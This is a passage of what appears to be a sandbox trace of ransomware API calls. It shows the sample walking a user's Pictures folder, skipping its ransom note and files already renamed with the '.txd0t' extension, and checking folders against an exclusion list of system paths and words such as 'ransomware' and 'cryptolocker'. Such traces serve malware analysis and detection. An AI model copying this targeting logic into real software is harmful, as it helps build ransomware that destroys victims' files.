(psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.869] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.869] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd323bc90, ftCreationTime.dwHighDateTime=0x1d5eb85, ftLastAccessTime.dwLowDateTime=0xea7abc60, ftLastAccessTime.dwHighDateTime=0x1d5edea, ftLastWriteTime.dwLowDateTime=0x52394f6d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8c8a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="6to-Do2T3Y6Ag.jpg.txd0t", cAlternateFileName="6TO-DO~1.TXD")) returned 1 [0119.869] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg.txd0t", psz2=".") returned 1 [0119.869] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg.txd0t", psz2="..") returned 1 [0119.869] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.869] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.869] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="6to-Do2T3Y6Ag.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t" [0119.869] PathFindExtensionW (pszPath="6to-Do2T3Y6Ag.jpg.txd0t") returned=".txd0t" [0119.869] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.869] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2704850, ftCreationTime.dwHighDateTime=0x1d5e90c, ftLastAccessTime.dwLowDateTime=0x87a14c10, ftLastAccessTime.dwHighDateTime=0x1d5efbd, ftLastWriteTime.dwLowDateTime=0x524ada4e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11e6a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="7ln6G64dp6.gif.txd0t", cAlternateFileName="7LN6G6~1.TXD")) returned 1 [0119.869] StrCmpW (psz1="7ln6G64dp6.gif.txd0t", psz2=".") returned 1 [0119.869] StrCmpW (psz1="7ln6G64dp6.gif.txd0t", psz2="..") returned 1 [0119.869] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.869] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.869] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="7ln6G64dp6.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t" [0119.869] PathFindExtensionW (pszPath="7ln6G64dp6.gif.txd0t") returned=".txd0t" [0119.869] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.869] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6ba20, ftCreationTime.dwHighDateTime=0x1d5ea6d, ftLastAccessTime.dwLowDateTime=0xf55c7820, ftLastAccessTime.dwHighDateTime=0x1d5e3c8, ftLastWriteTime.dwLowDateTime=0x5252e086, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4c6a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", cAlternateFileName="AI_VKH~1.TXD")) returned 1 [0119.869] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", psz2=".") returned 1 [0119.869] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", psz2="..") returned 1 [0119.869] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.869] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.869] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t" [0119.869] PathFindExtensionW (pszPath="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned=".txd0t" [0119.869] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.869] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0119.869] StrCmpW (psz1="Camera Roll", psz2=".") returned 1 [0119.869] StrCmpW (psz1="Camera Roll", psz2="..") returned 1 [0119.870] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.870] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.870] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Camera Roll", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0119.870] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system32\\") returned 0x0 [0119.870] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\local\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\boot\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\perflogs\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\programdata\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\drivers\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\wsus\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="crypt_detect") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="cryptolocker") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="ransomware") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\WINDOWS") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.871] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files") returned 0x0 [0119.871] GetProcessHeap () returned 0xe30000 [0119.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ca) returned 0xed39f8 [0119.871] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0119.871] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", psz2="\\*", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*" [0119.871] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e70 [0119.872] StrCmpW (psz1=".", psz2=".") returned 0 [0119.872] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.872] StrCmpW (psz1="..", psz2=".") returned 1 [0119.872] StrCmpW (psz1="..", psz2="..") returned 0 [0119.872] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.872] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.872] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.872] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.872] FindClose (in: hFindFile=0xec1e70 | out: hFindFile=0xec1e70) returned 1 [0119.872] GetProcessHeap () returned 0xe30000 [0119.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.872] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.872] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.873] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.873] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2093e810, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0x1b242240, ftLastAccessTime.dwHighDateTime=0x1d5ece0, ftLastWriteTime.dwLowDateTime=0x525ed1ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11122, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="dF_BgEryZj.gif.txd0t", cAlternateFileName="DF_BGE~1.TXD")) returned 1 [0119.873] StrCmpW (psz1="dF_BgEryZj.gif.txd0t", psz2=".") returned 1 [0119.873] StrCmpW (psz1="dF_BgEryZj.gif.txd0t", psz2="..") returned 1 [0119.873] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="dF_BgEryZj.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t" [0119.873] PathFindExtensionW (pszPath="dF_BgEryZj.gif.txd0t") returned=".txd0t" [0119.873] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.873] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744e5b30, ftCreationTime.dwHighDateTime=0x1d5e6bc, ftLastAccessTime.dwLowDateTime=0xcba39720, ftLastAccessTime.dwHighDateTime=0x1d5e819, ftLastWriteTime.dwLowDateTime=0x525a0c5d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f4d, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="F1oeE.png.txd0t", cAlternateFileName="F1OEEP~1.TXD")) returned 1 [0119.873] StrCmpW (psz1="F1oeE.png.txd0t", psz2=".") returned 1 [0119.873] StrCmpW (psz1="F1oeE.png.txd0t", psz2="..") returned 1 [0119.873] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="F1oeE.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t" [0119.873] PathFindExtensionW (pszPath="F1oeE.png.txd0t") returned=".txd0t" [0119.873] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.873] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6004be50, ftCreationTime.dwHighDateTime=0x1d5ed5e, ftLastAccessTime.dwLowDateTime=0xf3c22a90, ftLastAccessTime.dwHighDateTime=0x1d5e4f0, ftLastWriteTime.dwLowDateTime=0x5257a7a9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3454, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="gpNFvPMeWkFC.gif.txd0t", cAlternateFileName="GPNFVP~1.TXD")) returned 1 [0119.873] StrCmpW (psz1="gpNFvPMeWkFC.gif.txd0t", psz2=".") returned 1 [0119.873] StrCmpW (psz1="gpNFvPMeWkFC.gif.txd0t", psz2="..") returned 1 [0119.873] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="gpNFvPMeWkFC.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t" [0119.873] PathFindExtensionW (pszPath="gpNFvPMeWkFC.gif.txd0t") returned=".txd0t" [0119.873] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.873] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb41f0, ftCreationTime.dwHighDateTime=0x1d5ed24, ftLastAccessTime.dwLowDateTime=0xd75a8bc0, ftLastAccessTime.dwHighDateTime=0x1d5e790, ftLastWriteTime.dwLowDateTime=0x5257a7a9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16b18, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", cAlternateFileName="G_PWWK~1.TXD")) returned 1 [0119.873] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", psz2=".") returned 1 [0119.873] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", psz2="..") returned 1 [0119.873] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.873] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.899] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t" [0119.900] PathFindExtensionW (pszPath="g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned=".txd0t" [0119.900] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.900] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36585490, ftCreationTime.dwHighDateTime=0x1d5e6e7, ftLastAccessTime.dwLowDateTime=0x861a3360, ftLastAccessTime.dwHighDateTime=0x1d5e4e7, ftLastWriteTime.dwLowDateTime=0x526859a7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaa2d, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="JNDCEREvKtt-06-A0UX8.png.txd0t", cAlternateFileName="JNDCER~1.TXD")) returned 1 [0119.900] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png.txd0t", psz2=".") returned 1 [0119.900] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png.txd0t", psz2="..") returned 1 [0119.900] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.900] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.900] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="JNDCEREvKtt-06-A0UX8.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t" [0119.900] PathFindExtensionW (pszPath="JNDCEREvKtt-06-A0UX8.png.txd0t") returned=".txd0t" [0119.900] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.900] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0x52f50403, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="kG7T_G4j-", cAlternateFileName="KG7T_G~1")) returned 1 [0119.900] StrCmpW (psz1="kG7T_G4j-", psz2=".") returned 1 [0119.900] StrCmpW (psz1="kG7T_G4j-", psz2="..") returned 1 [0119.900] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.900] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.900] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="kG7T_G4j-", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system32\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\local\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\boot\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\perflogs\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\programdata\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\drivers\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\wsus\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.900] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="crypt_detect") returned 0x0 [0119.901] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="cryptolocker") returned 0x0 [0119.901] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="ransomware") returned 0x0 [0119.901] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\WINDOWS") returned 0x0 [0119.901] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.901] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files") returned 0x0 [0119.901] GetProcessHeap () returned 0xe30000 [0119.901] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xed39f8 [0119.901] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.901] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*" [0119.901] FindFirstFileW (in: 